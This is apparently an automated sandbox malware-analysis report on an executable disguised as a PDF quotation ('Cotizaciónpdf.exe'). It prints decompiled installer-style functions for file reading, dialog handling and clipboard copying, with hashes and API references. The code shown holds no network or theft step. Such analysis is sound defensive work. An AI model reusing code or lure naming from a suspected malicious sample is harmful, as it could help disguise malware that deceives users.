Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004055A3, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055A3(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x004055a3
0x004055b6
0x004055b6
0x004055ba
0x00000000
0x00000000
0x004055ad
0x004055b0
0x00000000
0x004055b0
0x00000000
0x004055ad
0x004055bc

APIs

CharNextA.USER32(?,004032D0,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,00000020), ref: 004055B0

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction ID: 212f79cf8e49c78bb4d3bcb882a40a201b2a74796c2719e18ccee86c52fb87a0
Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction Fuzzy Hash: B5C0807440E540B7D51057104C284677FF1AA51340F24845BF4C063195D1386C40CF3A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404f6a
0x00404f70
0x00404f79
0x00404f7c
0x00405114
0x00405138
0x00405138
0x0040514b
0x00405169
0x00405170
0x004051c7
0x004051cb
0x00000000
0x004051d2
0x004051da
0x004051e2
0x004051e5
0x004052de
0x00000000
0x004052de
0x004051f4
0x00405200
0x00405206
0x0040520c
0x00405221
0x00405227
0x0040520e
0x00405213
0x00405219
0x0040521c
0x0040521c
0x00405237
0x0040523f
0x00405242
0x0040524b
0x0040524e
0x00405255
0x0040525c
0x00405264
0x00405264
0x0040527b
0x0040527b
0x00405282
0x00405288
0x00405291
0x00405298
0x004052a1
0x004052a3
0x004052a6
0x004052b5
0x004052b7
0x004052bd
0x004052be
0x004052bf
0x004052c7
0x004052d2
0x004052d8
0x004052d8
0x00000000
0x00405242
0x004051cb
0x00405178
0x004051a8
0x004051b0
0x004051b2
0x004051bb
0x004051bb
0x004051c2
0x00000000
0x004051c2
0x0040517c
0x00405186
0x00000000
0x0040514d
0x00405153
0x0040518b
0x00000000
0x00405194
0x0040515c
0x00405161
0x00405164
0x00000000
0x00405164
0x0040514b
0x00404f82
0x00404f86
0x00404f8f
0x00404f96
0x00404f99
0x00404f9c
0x00404f9f
0x00404fa0
0x00404fa1
0x00404fba
0x00404fbd
0x00404fc7
0x00404fd6
0x00404fde
0x00404fe6
0x00404feb
0x00404fee
0x00404ffa
0x00405003
0x0040500c
0x0040502f
0x00405035
0x00405046
0x0040504b
0x00405059
0x00405067
0x00405067
0x0040506c
0x0040507a
0x0040507a
0x0040507f
0x00405082
0x00405087
0x00405093
0x0040509c
0x004050a9
0x004050b8
0x004050ab
0x004050b0
0x004050b0
0x004050c4
0x004050c4
0x004050d8
0x004050e1
0x004050ea
0x004050fa
0x00405106
0x00405106
0x00000000

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32 ref: 00405035
SendMessageA.USER32 ref: 00405046
SendMessageA.USER32 ref: 00405059
SendMessageA.USER32 ref: 00405067
SendMessageA.USER32 ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32 ref: 004050E1
SendMessageA.USER32 ref: 004050FA
SendMessageA.USER32 ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32 ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(?,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32 ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32 ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32 ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32 ref: 004052D2
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8

Strings

{, xrefs: 004051C7

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404790
0x00404796
0x00404798
0x0040479e
0x004047a4
0x004047b1
0x004047ba
0x004047bd
0x004047c0
0x004049e8
0x004049ef
0x00404a03
0x004049f1
0x004049f3
0x004049f6
0x004049f7
0x004049fe
0x004049fe
0x00404a0f
0x00404a1d
0x00404a20
0x00404a36
0x00404aae
0x00404ab1
0x00404ab3
0x00404abd
0x00404acb
0x00404acb
0x00404acd
0x00404ad7
0x00404add
0x00404afe
0x00404adf
0x00404aec
0x00404aec
0x00404add
0x00404ad7
0x00000000
0x00404ab1
0x00404a3b
0x00404a46
0x00404a4b
0x00404a52
0x00404a59
0x00404a63
0x00404a63
0x00404a67
0x00404a6c
0x00404a71
0x00404a87
0x00404a73
0x00404a73
0x00404a7b
0x00404a82
0x00404a7d
0x00404a7d
0x00404a7d
0x00404a7b
0x00404a8b
0x00404a8d
0x00404a9b
0x00404a9c
0x00404aa8
0x00404aab
0x00404aab
0x00404a6c
0x00000000
0x00404a59
0x00404a3d
0x00404a44
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b01
0x00404b01
0x00404b08
0x00404b7c
0x00404b83
0x00404b8f
0x00404b8f
0x00404b98
0x00404b9a
0x00404ba1
0x00404ba4
0x00404ba4
0x00404baa
0x00404bb1
0x00404bb4
0x00404bb4
0x00404bba
0x00404bc0
0x00404bc6
0x00404bc6
0x00404bd3
0x00404d20
0x00404d27
0x00404d44
0x00404d4a
0x00404d5c
0x00404d5c
0x00000000
0x00404bd9
0x00404bdb
0x00404be3
0x00404be7
0x00404be7
0x00404bef
0x00404c30
0x00404c32
0x00404c42
0x00404c45
0x00404c4a
0x00404c51
0x00404c54
0x00404cf6
0x00404cfc
0x00404d0a
0x00404d1b
0x00404d1b
0x00000000
0x00404d0a
0x00404c5a
0x00404c5d
0x00404c63
0x00404c68
0x00404c6a
0x00404c6c
0x00404c72
0x00404c79
0x00404c7e
0x00404c85
0x00404c88
0x00404c88
0x00404c8f
0x00404c9b
0x00404c9f
0x00404ca1
0x00404ca1
0x00404c91
0x00404c93
0x00404c93
0x00404cc1
0x00404ccd
0x00404cdc
0x00404cdc
0x00404cde
0x00404ce1
0x00404cea
0x00000000
0x00404bf1
0x00404bfc
0x00404bff
0x00404c04
0x00404c06
0x00404c0a
0x00404c1a
0x00404c24
0x00404c26
0x00404c29
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c0c
0x00404c0c
0x00404c12
0x00404c14
0x00404c14
0x00404c15
0x00404c16
0x00000000
0x00404c0c
0x00404bef
0x00404bd3
0x00404b10
0x00000000
0x00404b26
0x00404b30
0x00404b35
0x00000000
0x00000000
0x00404b47
0x00404b4c
0x00404b58
0x00404b58
0x00404b5a
0x00404b69
0x00404b6b
0x00404b72
0x00404b75
0x00000000
0x00404b75
0x00404b10
0x004047c6
0x004047cb
0x004047d5
0x004047d6
0x004047df
0x004047ea
0x004047f5
0x004047fb
0x00404809
0x0040481e
0x00404823
0x0040482e
0x00404837
0x0040484c
0x0040485d
0x0040486a
0x0040486a
0x0040486f
0x00404875
0x00404877
0x0040487a
0x0040487f
0x00404884
0x00404886
0x00404886
0x004048a6
0x004048a6
0x004048a8
0x004048a9
0x004048ae
0x004048b1
0x004048b4
0x004048b8
0x004048bd
0x004048c2
0x004048c6
0x004048cb
0x004048d0
0x004048d2
0x004048da
0x004049a4
0x004049b7
0x00000000
0x004048e0
0x004048e3
0x004048e6
0x004048e9
0x004048e9
0x004048ef
0x004048f5
0x004048f8
0x004048fe
0x004048ff
0x00404904
0x0040490d
0x00404914
0x00404917
0x0040491a
0x0040491d
0x00404959
0x00404982
0x0040495b
0x00404968
0x00404968
0x0040491f
0x00404922
0x00404931
0x0040493b
0x00404943
0x0040494a
0x00404952
0x00404952
0x0040491d
0x00404988
0x00404989
0x00404995
0x00404995
0x004049a2
0x004049bd
0x004049c1
0x004049de
0x004049e3
0x004049e6
0x00000000
0x004049c3
0x004049c8
0x004049d1
0x00404d5e
0x00404d70
0x00404d70
0x004049c1
0x00000000
0x004049a2
0x004048da

APIs

